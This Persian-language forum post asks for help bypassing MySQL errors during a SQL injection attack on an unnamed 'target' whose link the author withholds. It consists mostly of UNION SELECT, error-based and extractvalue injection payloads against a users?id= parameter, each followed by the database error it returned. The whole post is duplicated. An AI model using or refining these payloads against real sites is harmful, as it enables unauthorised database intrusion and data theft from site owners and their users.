با سلام خدمت دوستان
من با یه مشکل در اینجکت کردن یه تارگت مواجه شدم که با روش های مختلف موفق به بایپس اون نشدم.
از این که نمی تونم لینک تارگت رو قرار بدم از شما عذرخواهی می کنم.
تارگت مورد نظر من دارای 8 ستون هست. وقتی که از دستور زیر استفاده می کنم با پیغام خطای زیر مواجه میشم:
[PHP]
http://www.target.com/users/?id=-240+UNION+SELECT+1,2,3,4,5,6,7,8--
[/PHP]
پیام خطای مورد نظر:
[PHP]
The used SELECT statements have a different number of columns
[/PHP]
استفاده از روش Error Based SQL Injection:
[PHP]
http://www.target.com/users/?id=240 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
[/PHP]
پیام خطای مورد نظر:
[PHP]
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by concat_ws(0x3aversion()floor(rand(0)*2)) having min(0) or 1' at line 1
[/PHP]
حتی از روش Xpath Injection هم نتونستم مشکلم رو حل کنم.
[PHP]
http://www.target.com/users/?id=240+and+extractvalue(rand(),concat(unhex(hex(v ersion()))))--
Or
http://www.target.com/users/?id=-240+and+extractvalue(rand(),concat(unhex(hex(versi on()))))--
[/PHP]
پیام خطای مورد نظر:
[PHP]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(unhex(hex(version()))))' at line 1
[/PHP]
می خواستم بپرسم آیا راه یا روشی برای بایپس کردن این ارورها وجود داره؟
اگه کسی در این زمینه آشنایی داره ازش ممنون میشم راهنمایی کنه.
با تقدیم احترام
صداقت
من با یه مشکل در اینجکت کردن یه تارگت مواجه شدم که با روش های مختلف موفق به بایپس اون نشدم.
از این که نمی تونم لینک تارگت رو قرار بدم از شما عذرخواهی می کنم.
تارگت مورد نظر من دارای 8 ستون هست. وقتی که از دستور زیر استفاده می کنم با پیغام خطای زیر مواجه میشم:
[PHP]
http://www.target.com/users/?id=-240+UNION+SELECT+1,2,3,4,5,6,7,8--
[/PHP]
پیام خطای مورد نظر:
[PHP]
The used SELECT statements have a different number of columns
[/PHP]
استفاده از روش Error Based SQL Injection:
[PHP]
http://www.target.com/users/?id=240 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
[/PHP]
پیام خطای مورد نظر:
[PHP]
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by concat_ws(0x3aversion()floor(rand(0)*2)) having min(0) or 1' at line 1
[/PHP]
حتی از روش Xpath Injection هم نتونستم مشکلم رو حل کنم.
[PHP]
http://www.target.com/users/?id=240+and+extractvalue(rand(),concat(unhex(hex(v ersion()))))--
Or
http://www.target.com/users/?id=-240+and+extractvalue(rand(),concat(unhex(hex(versi on()))))--
[/PHP]
پیام خطای مورد نظر:
[PHP]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(unhex(hex(version()))))' at line 1
[/PHP]
می خواستم بپرسم آیا راه یا روشی برای بایپس کردن این ارورها وجود داره؟
اگه کسی در این زمینه آشنایی داره ازش ممنون میشم راهنمایی کنه.
با تقدیم احترام
صداقت
نظر